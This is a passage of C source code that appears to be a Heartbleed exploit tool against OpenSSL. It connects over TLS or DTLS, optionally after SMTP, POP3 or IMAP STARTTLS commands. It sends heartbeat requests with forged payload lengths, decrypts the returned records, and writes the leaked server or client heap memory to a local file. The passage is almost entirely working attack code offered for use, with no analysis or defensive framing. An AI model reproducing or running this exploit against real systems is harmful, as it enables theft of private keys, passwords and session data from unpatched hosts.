*priority);\r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap);\r\n\r\nint tcp_connect(char* server,int port){\r\n\tint sd,ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n host = gethostbyname(server);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n bzero(&(sa.sin_zero),8);\r\n\tprintf("[ connecting to %s %d/tcp\\n",server,port);\r\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\r\n\tif(ret==0){\r\n\t\tprintf("[ connected to %s %d/tcp\\n",server,port);\r\n\t}\r\n\telse{\r\n\t\tprintf("[!] FATAL: could not connect to %s %d/tcp\\n",server,port);\r\n\t\texit(0);\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nint tcp_bind(char* server, int port){\r\n\tint sd, ret, val=1;\r\n\tstruct sockaddr_in sin;\r\n\tstruct hostent *host;\r\n\thost = gethostbyname(server);\r\n\tsd=socket(AF_INET,SOCK_STREAM,0);\r\n\tif(sd==-1){\r\n \t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tmemset(&sin,0,sizeof(sin));\r\n\tsin.sin_addr=*((struct in_addr *) host->h_addr);\r\n\tsin.sin_family=AF_INET;\r\n\tsin.sin_port=htons(port);\r\n \tsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\r\n\tret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\r\n\tif(ret==-1){\r\n\t\tprintf("[!] cannot bind socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tlisten(sd,5);\r\n\treturn(sd);\r\n}\r\n\r\nconnection* dtls_server(int sd, char* server,int port){\r\n\tint bytes;\r\n connection *c;\r\n char* buf;\r\n\tbuf = malloc(4096);\r\n\tint ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n\tunsigned long addr;\r\n if ((host = gethostbyname(server)) == NULL) {\r\n\t\tperror("gethostbyname");\r\n\t\texit(1);\r\n\t}\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n\tif (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n\t\tperror("bind()");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tBIO *bio;\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n if(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tmemset(buf,0,4096);\r\n\tc = malloc(sizeof(connection));\r\n\tif(c==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_server_method());\r\n\tSSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\r\n\tSSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);\r\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); \r\n\tif(!SSL_CTX_check_private_key(c->sslContext)){\r\n\t\tprintf("[!] FATAL: private key does not match the certificate public key\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n\r\n SSL_set_bio(c->sslHandle, bio, bio);\r\n SSL_set_accept_state (c->sslHandle);\r\n\r\n int rc = SSL_accept(c->sslHandle);\r\n\tprintf ("[ SSL connection using %s\\n", SSL_get_cipher (c->sslHandle));\r\n//\tbytes = SSL_read(c->sslHandle, buf, 4095);\r\n//\tprintf("[ recieved: %d bytes - showing output\\n%s\\n[\\n",bytes,buf);\r\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n return c;\r\n}\r\n\r\nvoid ssl_init(){\r\n SSL_load_error_strings();\r\n SSL_library_init();\r\n OpenSSL_add_all_digests();\r\n OpenSSL_add_all_algorithms();\r\n OpenSSL_add_all_ciphers();\r\n}\r\n\r\nconnection* tls_connect(int sd){\r\n connection *c;\r\n\tc = malloc(sizeof(connection));\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n\treturn c;\r\n}\r\n\r\nconnection* dtls_client(int sd, char* server,int port){\r\n\tint ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n connection *c;\r\n\tmemset((char *)&sa,0,sizeof(sa));\r\n\tc = malloc(sizeof(connection));\r\n if ((host = gethostbyname(server)) == NULL) {\r\n\t\tperror("gethostbyname");\r\n\t\texit(1);\r\n\t}\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n\tif (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n\t\tperror("connect()");\r\n\t\texit(0);\r\n\t}\r\n\r\n\tBIO *bio;\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_client_method());\r\n\tSSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslHandle = SSL_new(c->sslContext);\r\n\tSSL_set_tlsext_host_name(c->sslHandle,server);\r\n\tbio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n\r\n\tBIO_ctrl_set_connected(bio, 1, &sa);\r\n\tSSL_set_bio(c->sslHandle, bio, bio);\r\n\tSSL_set_connect_state (c->sslHandle);\r\n//printf("eshta\\n");\r\n if(SSL_connect(c->sslHandle)!=1) \r\n ERR_print_errors_fp(stderr);\r\n\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway), %d \\n",c->sslHandle->tlsext_heartbeat);\r\n }\r\n\treturn c;\r\n}\r\n\r\nconnection* tls_bind(int sd){\r\n\tint bytes;\r\n connection *c;\r\n char* buf;\r\n\tbuf = malloc(4096);\r\n if(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tmemset(buf,0,4096);\r\n\tc = malloc(sizeof(connection));\r\n\tif(c==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\r\n\tSSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);\r\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); \r\n\tif(!SSL_CTX_check_private_key(c->sslContext)){\r\n\t\tprintf("[!] FATAL: private key does not match the certificate public key\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n int rc = SSL_accept(c->sslHandle);\r\n\tprintf ("[ SSL connection using %s\\n", SSL_get_cipher (c->sslHandle));\r\n\tbytes = SSL_read(c->sslHandle, buf, 4095);\r\n\tprintf("[ recieved: %d bytes - showing output\\n%s\\n[\\n",bytes,buf);\r\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n return c;\r\n}\r\n\r\nint pre_cmd(int sd,int precmd,int verbose){\r\n\t/* this function can be used to send commands to a plain-text\r\n\tservice or client before heartbleed exploit attempt. e.g. STARTTLS */\r\n\tint rc, go = 0;\r\n\tchar* buffer;\r\n\tchar* line1;\r\n\tchar* line2; \r\n\tswitch(precmd){\r\n\t\tcase 0:\r\n\t\t\tline1 = "EHLO test\\n";\r\n\t\t\tline2 = "STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\tline1 = "CAPA\\n";\r\n\t\t\tline2 = "STLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\tline1 = "a001 CAPB\\n";\r\n\t\t\tline2 = "a002 STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tgo = 1;\r\n\t\t\tbreak;\r\n\t}\r\n\tif(go==0){\r\n\t\tbuffer = malloc(2049);\r\n\t if(buffer==NULL){\r\n \tprintf("[ error in malloc()\\n");\r\n \texit(0);\r\n\t }\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tprintf("[ banner: %s",buffer);\r\n\t\tsend(sd,line1,strlen(line1),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t\tsend(sd,line2,strlen(line2),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nvoid* heartbleed(connection *c,unsigned int type){\r\n\tunsigned char *buf, *p;\r\n int ret;\r\n\tbuf = OPENSSL_malloc(1 + 2);\r\n\tif(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tp = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n\tswitch(type){\r\n\t\tcase 0:\r\n\t\t\ts2n(0x0,p);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\ts2n(0xffff,p);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tprintf("[ setting heartbeat payload_length to %u\\n",type);\r\n\t\t\ts2n(type,p);\r\n\t\t\tbreak;\r\n\t}\r\n\tprintf("[ <3 <3 <3 heart bleed <3 <3 <3\\n");\r\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\r\n OPENSSL_free(buf);\r\n\treturn c;\r\n}\r\n\r\nvoid* dtlsheartbleed(connection *c,unsigned int type){\r\n\r\n\tunsigned char *buf, *p;\r\n int ret;\r\n\tbuf = OPENSSL_malloc(1 + 2 + 16);\r\n\tmemset(buf, '\\0', sizeof buf);\r\n\tif(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tp = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n\tswitch(type){\r\n\t\tcase 0:\r\n\t\t\ts2n(0x0,p);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n//\t\t\ts2n(0xffff,p);\r\n//\t\t\ts2n(0x3feb,p);\r\n\t\t\ts2n(0x0538,p);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tprintf("[ setting heartbeat payload_length to %u\\n",type);\r\n\t\t\ts2n(type,p);\r\n\t\t\tbreak;\r\n\t}\r\n\ts2n(c->sslHandle->tlsext_hb_seq, p);\r\n\tprintf("[ <3 <3 <3 heart bleed <3 <3 <3\\n");\r\n\r\n ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);\r\n\r\n\tif (ret >= 0)\r\n\t\t{\r\n\t\tif (c->sslHandle->msg_callback)\r\n\t\t\tc->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT,\r\n\t\t\t\tbuf, 3 + 16,\r\n\t\t\t\tc->sslHandle, c->sslHandle->msg_callback_arg);\r\n\r\n\t\tdtls1_start_timer(c->sslHandle);\r\n\t\tc->sslHandle->tlsext_hb_pending = 1;\r\n\t\t}\r\n\r\n OPENSSL_free(buf);\r\n\r\n\treturn c;\r\n}\r\n\r\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\r\n\tchar *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n\tSSL* s;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned mac_size, orig_len;\r\n size_t extra;\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\r\n extra=SSL3_RT_MAX_EXTRA;\r\n else\r\n extra=0;\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple; \r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->length);\r\n\t\t\tif(rr->type==24){\r\n\t\t\t\tprintf("[ heartbeat returned type=%d length=%u\\n",rr->type, rr->length);\r\n\t\t\t\tif(rr->length > 16834){\r\n\t\t\t\t\tprintf("[ error: got a malformed TLS length.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse{\r\n\t\t\t\tprintf("[ incorrect record type=%d length=%u returned\\n",rr->type,rr->length);\r\n\t\t\t\ts->packet_length=0;\r\n\t\t\t\tbadpackets++;\r\n\t\t\t\tif(badpackets > 3){\r\n\t\t\t\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tgoto apple;\r\n\t\t\t}\r\n }\r\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple; \r\n }\r\n\tprintf("[ decrypting SSL packet\\n");\r\n s->rstate=SSL_ST_READ_HEADER; \r\n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n tls1_enc(s,0);\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n\tif(first==0){\r\n\t\tuint heartbleed_len = 0;\r\n\t\tchar* fp = s->s3->rrec.data;\r\n\t\t(long)fp++;\r\n\t\tmemcpy(&heartbleed_len,fp,2);\r\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n\t\tfirst = 2;\r\n\t\tleakbytes = heartbleed_len + 16;\r\n\t\tprintf("[ heartbleed leaked length=%u\\n",heartbleed_len);\r\n\t}\r\n\tif(verbose==1){\r\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf("\\n");\r\n }\r\n\tleakbytes-=rr->length;\r\n\tif(leakbytes > 0){\r\n\t\trepeat = 1;\r\n\t}\r\n\telse{\r\n\t\trepeat = 0;\r\n\t}\r\n\tprintf("[ final record type=%d, length=%u\\n", rr->type, rr->length);\r\n\tint output = s->s3->rrec.length-3;\r\n\tif(output > 0){\r\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n\t if(first==2){\r\n\t\t\tfirst--;\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\t/* first three bytes are resp+len */\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length-3,filename);\r\n\t\t}\r\n\t\telse{\r\n\t\t\t/* heap data & 16 bytes padding */\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length,filename);\r\n\t\t}\r\n\t\tclose(fd);\r\n\t}\r\n\telse{\r\n\t\tprintf("[ nothing from the heap to write\\n");\r\n\t}\r\n\treturn;\r\napple:\r\n printf("[ problem handling SSL record packet - wrong type?\\n");\r\n\tbadpackets++;\r\n\tif(badpackets > 3){\r\n\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\n\r\nvoid* dtlssneakyleaky(connection *c,char* filename, int verbose){\r\n\tchar *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n\tSSL* s;\r\n\tDTLS1_BITMAP *bitmap;\r\n\tunsigned int is_next_epoch;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned int mac_size, orig_len;\r\n\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n\r\nagain:\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < DTLS1_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple; \r\n\r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n\t\t\tn2s(p,rr->epoch);\r\n\t\t\tmemcpy(&(s->s3->read_sequence[2]), p, 6);\r\n\t\t\tp+=6;\r\n n2s(p,rr->length);\r\n\t\t\tif(rr->type==24){\r\n\t\t\t\tprintf("[ heartbeat returned type=%d length=%u\\n",rr->type, rr->length);\r\n\t\t\t\tif(rr->length > 16834){\r\n\t\t\t\t\tprintf("[ error: got a malformed TLS length.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse{\r\n\t\t\t\tprintf("[ incorrect record type=%d length=%u returned\\n",rr->type,rr->length);\r\n\t\t\t\ts->packet_length=0;\r\n\t\t\t\tbadpackets++;\r\n\t\t\t\tif(badpackets > 3){\r\n\t\t\t\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tgoto apple;\r\n\t\t\t}\r\n }\r\n\r\n if (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple; \r\n }\r\n\t\tif ( n != i)\r\n\t\t\t{\r\n\t\t\trr->length = 0;\r\n\t\t\ts->packet_length = 0;\r\n\t\t\tgoto again;\r\n\t\t\t}\r\n\tprintf("[ decrypting SSL packet\\n");\r\n s->rstate=SSL_ST_READ_HEADER; \r\n\r\n\tbitmap = dtls1_get_bitmap(s, rr, &is_next_epoch);\r\n\tif ( bitmap == NULL)\r\n\t\t{\r\n\t\trr->length = 0;\r\n\t\ts->packet_length = 0;\r\n\t\tgoto again;\r\n\t\t}\r\n\r\n\t\tif (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE &&\r\n\t\t *p == SSL3_MT_CLIENT_HELLO) &&\r\n\t\t !dtls1_record_replay_check(s, bitmap))\r\n\t\t\t{\r\n\t\t\trr->length = 0;\r\n\t\t\ts->packet_length=0;\r\n\t\t\tgoto again;\r\n\t\t\t}\r\n\r\n\tif (rr->length == 0) goto again;\r\nif (is_next_epoch)\r\n\t\t{\r\n\t\tif ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen)\r\n\t\t\t{\r\n\t\t\tdtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num);\r\n\t\t\t}\r\n\t\trr->length = 0;\r\n\t\ts->packet_length = 0;\r\n\t\tgoto again;\r\n\t\t}\r\n\r\n\r\n rr->input= &(s->packet[DTLS1_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n\torig_len=rr->length;\r\n\r\n dtls1_enc(s,0);\r\n\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n\tdtls1_record_bitmap_update(s, &(s->d1->bitmap));\r\n\tif(first==0){\r\n\t\tuint heartbleed_len = 0;\r\n\t\tchar* fp = s->s3->rrec.data;\r\n\t\t(long)fp++;\r\n\t\tmemcpy(&heartbleed_len,fp,2);\r\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n\t\tfirst = 2;\r\n\t\tleakbytes = heartbleed_len + 16;\r\n\t\tprintf("[ heartbleed leaked length=%u\\n",heartbleed_len);\r\n\t}\r\n\tif(verbose==1){\r\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf("\\n");\r\n }\r\n\tleakbytes-=rr->length;\r\n\tif(leakbytes > 0){\r\n\t\trepeat = 1;\r\n\t}\r\n\telse{\r\n\t\trepeat = 0;\r\n\t}\r\n\tprintf("[ final record type=%d, length=%u\\n", rr->type, rr->length);\r\n\tint output = s->s3->rrec.length-3;\r\n\tif(output > 0){\r\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n\t if(first==2){\r\n\t\t\tfirst--;\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\t/* first three bytes are resp+len */\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length-3,filename);\r\n\t\t}\r\n\t\telse{\r\n\t\t\t/* heap data & 16 bytes padding */\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length,filename);\r\n\t\t}\r\n\t\tclose(fd);\r\n\t}\r\n\telse{\r\n\t\tprintf("[ nothing from the heap to 